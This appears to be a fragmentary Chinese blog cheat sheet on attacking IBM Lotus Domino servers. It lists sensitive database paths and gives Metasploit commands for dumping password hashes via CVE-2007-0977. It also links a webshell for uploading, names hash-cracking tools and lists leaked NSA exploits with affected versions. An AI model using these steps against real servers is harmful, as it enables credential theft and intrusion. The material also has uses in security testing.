MENU

IBM Lotus

May 3, 2017 • Security

漏洞

/names.nsf/$users
/domlog.nsf
/webadmin.nsf
/admin4.nsf

/names.nsf/$users CVE-2007-0977:

msf > use auxiliary/scanner/lotus/lotus_domino_hashes
msf auxiliary(lotus_domino_hashes) > show actions
msf auxiliary(lotus_domino_hashes) > set ACTION < action-name >
msf auxiliary(lotus_domino_hashes) > show options
msf auxiliary(lotus_domino_hashes) > run

msf

/domlog.nsf Session ID:

domlog.nsf

/webadmin.nsf

shell

Shell.nsf:https://github.com/rajeshpathack/shell.nsf

upload

rce

解密

john

工具

https://www.secquest.co.uk/tools/lapdance.pl

lapdance

来自ShadowBrokers泄漏的NSA武器库:

Easypi

EQGRP_Lost_in_Translation-master\windows\exploits

IBM Lotus Notes远程溢出

影响版本:IBM Lotus Notes (Windows NT、2000、XP、2003)

Emphasismine

EQGRP_Lost_in_Translation-master\windows\exploits

针对Lotus Domino IMAP服务的漏洞攻击

影响版本:IBM Lotus Domino 6.5.4、6.5.5、7.0、8.0、8.5

Ewokfrenzy

EQGRP_Lost_in_Translation-master\windows\exploits

同上,针对Lotus Domino IMAP服务的漏洞攻击

影响版本:IBM Lotus Domino 6.5.4、7.0.2

参考

最后编辑于: September 3, 2019 18:40
Archives QR Code
QR Code for this page
Tipping QR Code